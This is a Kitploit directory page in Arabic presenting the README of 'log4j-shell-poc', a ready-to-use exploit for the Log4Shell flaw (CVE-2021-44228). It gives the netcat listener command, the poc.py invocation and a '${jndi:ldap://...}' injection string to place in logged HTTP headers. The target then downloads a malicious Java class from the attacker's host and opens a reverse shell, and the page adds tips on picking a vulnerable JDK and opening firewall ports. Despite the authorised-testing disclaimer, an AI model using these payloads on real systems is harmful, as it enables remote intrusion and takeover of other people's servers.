Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j-shell-poc — إثبات المفهوم (Proof-Of-Concept) لثغرة CVE-2021-44228. | Kitploit
أدوات/GitHubGitHub/jiahong-guan/log4j-shell-poc
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubjiahong-guan/log4j-shell-poc

log4j-shell-poc

إثبات المفهوم (Proof-Of-Concept) لثغرة CVE-2021-44228.

عرض المستودع
16منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

log4shell-poc (CVE-2021-44228)

استغلال إثبات المفهوم لثغرة Log4j (CVE-2021-44228)، المعروفة أيضاً باسم Log4Shell. تولّد هذه الأداة فئة Java خبيثة، وتشغّل خادم إحالة LDAP، وتقدّم الحمولة عبر HTTP، مما يسمح لمهاجم عن بُعد بتنفيذ أوامر تعسفية على هدف مستضعف.

الميزات

  • الكشف التلقائي عن عنوان IPv4 المحلي كعنوان IP للربط الافتراضي.
  • دعم JDK 1.8.0_20 المرفق (موصى به) مع الرجوع إلى Java الخاصة بالنظام.
  • حمولة صدفة عكسية مضمّنة (تتصل مرة أخرى بمستمع netcat).
  • ترجمة نظيفة وتنظيف للملفات المُنشأة.

المتطلبات

  • Python 3.6 أو أحدث
  • يجب أن تكون الملفات/المجلدات التالية موجودة في نفس مجلد poc.py:
    • jdk1.8.0_20/ – نسخة من Oracle JDK 1.8.0_20 (تحتوي على bin/javac و bin/java). إذا كانت مفقودة، سيحاول البرنامج النصي استخدام أمرَي javac و java الخاصين بالنظام.
  • target/marshalsec-0.0.3-SNAPSHOT-all.jar – ملف marshalsec JAR المستخدم لتشغيل خادم LDAP.
  • التثبيت

    1. استنسخ هذا المستودع أو نزّله.
    2. ضع مجلد jdk1.8.0_20 وملف marshalsec JAR كما هو موصوف أعلاه.
    3. ثبّت تبعيات Python:
      root@kitploit:~
      pip install -r requirements.txt
      

    الاستخدام

    شغّل البرنامج النصي باستخدام Python:

    root@kitploit:~
    python3 poc.py [OPTIONS]
    

    وسائط سطر الأوامر

    الوسيطةالنوعالافتراضيالوصف
    --useripstringIPv4 مُكتشف تلقائياًعنوان IP الذي سترتبط به خوادم LDAP وHTTP وتعلن عنه. يجب أن يكون قابلاً للوصول من الجهاز الهدف.
    --webportinteger8000المنفذ الخاص بخادم HTTP الذي يقدّم ملف Exploit.class المُجمَّع.
    --lportinteger9001المنفذ الذي ينتظر فيه مستمع netcat الصدفة العكسية. ستتصل الحمولة مرة أخرى بـ userip:lport.

    مثال

    1. شغّل مستمع netcat على جهاز المهاجم (استبدل 9001 بالمنفذ الذي اخترته):

      root@kitploit:~
      nc -lvnp 9001
      
    2. شغّل الاستغلال:

      root@kitploit:~
      python3 poc.py --userip 192.168.1.10 --webport 8080 --lport 9001
      

      إذا حذفت --userip، فسيستخدم البرنامج النصي تلقائياً عنوان IPv4 الأساسي لجهازك.

    3. سيعرض البرنامج النصي سلسلة حمولة لحقنها في الهدف المستضعف، على سبيل المثال:

      root@kitploit:~
      ${jndi:ldap://192.168.1.10:1389/a}
      
    4. احقن هذه السلسلة في أي حقل إدخال أو ترويسة HTTP يتم تسجيلها بواسطة نسخة Log4j مستضعفة (مثل User-Agent وX-Forwarded-For وما إلى ذلك). سيتصل الهدف بخادم LDAP، ويجلب الفئة الخبيثة من خادم HTTP، وينفّذ الصدفة العكسية.

    5. يجب أن ترى اتصال صدفة يظهر في مستمع netcat الخاص بك.

    كيف يعمل

    1. يُنشئ البرنامج النصي ملف Exploit.java يحتوي على كود يفتح صدفة عكسية إلى userip:lport.
    2. يترجم الملف باستخدام JDK المرفق (أو javac الخاص بالنظام).
    3. يشغّل خادم LDAP (عبر marshalsec) يستجيب لعمليات بحث JNDI بمرجع إلى خادم HTTP.
    4. يشغّل خادم HTTP بسيطاً على webport لاستضافة ملف Exploit.class المُجمَّع.
    5. عندما يقوم هدف مستضعف ببحث JNDI باستخدام الحمولة المحقونة، يقوم بتنزيل الفئة وتنفيذها، مما يمنح المهاجم صدفة عكسية.

    ملاحظات مهمة

    • تستخدم حمولة الصدفة العكسية /bin/sh وهي مخصصة لأنظمة الهدف الشبيهة بـ Unix. بالنسبة لأهداف Windows، ستحتاج إلى تعديل الأمر داخل Exploit.java.
    • يُوصى باستخدام JDK 1.8.0_20 المرفق لأن الإصدارات الأحدث قد تمنع ميزة تحميل الفئات عن بُعد JNDI المستخدمة في هذا الاستغلال.
    • تأكد من أن جدران الحماية تسمح بالاتصالات الواردة على المنافذ المحددة (webport و lport)، وأن الهدف يمكنه الوصول إلى جهازك.

    التنظيف

    يزيل البرنامج النصي تلقائياً Exploit.java و Exploit.class عند الخروج (سواء بشكل طبيعي أو بعد KeyboardInterrupt). إذا كنت بحاجة إلى الاحتفاظ بالملفات لتصحيح الأخطاء، فقم بتعليق كتلة finally في poc.py.

    إخلاء المسؤولية

    هذه الأداة مخصصة لأغراض تعليمية واختبارات الأمان المصرح بها فقط. الاستخدام غير المصرح به لهذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها أمر غير قانوني. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

    الاعتمادات

    • إثبات المفهوم الأصلي بواسطة kozmer
    • Marshalsec بواسطة mbechler
    • ثغرة Log4j اكتشفها فريق أمان Alibaba Cloud
    تنزيل الأداة